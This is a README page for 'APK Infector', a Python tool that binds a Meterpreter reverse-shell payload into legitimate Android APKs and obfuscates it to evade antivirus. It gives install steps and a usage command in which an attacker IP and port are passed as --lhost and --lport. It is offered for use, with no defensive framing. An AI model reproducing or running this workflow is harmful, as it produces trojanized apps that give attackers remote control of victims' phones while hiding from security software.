Home

Awesome

<p align="center"> <img src="https://github.com/PushpenderIndia/apkinfector/blob/master/img/logo.png" alt="APK Infector Logo" width=300 height=200/> </p> <h1 align="center">APK Infector</h1> <p align="center"> <a href="https://python.org"> <img src="https://img.shields.io/badge/Python-3-green.svg"> </a> <a href="https://github.com/PushpenderIndia/apkinfector/blob/master/LICENSE"> <img src="https://img.shields.io/badge/License-BSD%203-lightgrey.svg"> </a> <a href="https://github.com/PushpenderIndia/apkinfector/releases"> <img src="https://img.shields.io/badge/Release-1.0-blue.svg"> </a> <a href="https://github.com/PushpenderIndia/apkinfector"> <img src="https://img.shields.io/badge/Open%20Source-%E2%9D%A4-brightgreen.svg"> </a> </p>
                    This small python script can do really awesome work.
                    

Advanced Android Antivirus Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK & can completely ofusticate the meterpreter payload with different techniques.

Features

Tools Overview

Front ViewSample Feature
Indexf

Prerequisite

Tested On

Kali) Kali Linux - 2019.4

Installation & Usage


# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/apkinfector.git

# Navigate to technowlogger folder
$ cd apkinfector

# Installing dependencies
$ apt-get update && apt-get install apktool && apt-get install zipalign && apt-get install apksigner

# Running the Tool for 1st Time
$ python3 infector.py --help

# Usage Example
$ python3 infector.py --lhost 192.168.43.70 --lport 4444 --apk-name NEW_APK_NAME --normal-apk /root/Desktop/Path/TO/Legitemate_APK_File.apk

Available Arguments

Short HandFull HandDescription
-h--helpshow this help message and exit
Short HandFull HandDescription
--lhost 192.168.44.33Attacker's IP Address
--lport 4444Attacker's Port
-n NORMAL_APK--normal-apk NORMAL_APKAbsolute Path of Legitimate APK File
--apk-name APKNAMEAPK Name (Anything You Want To Name)

Contribute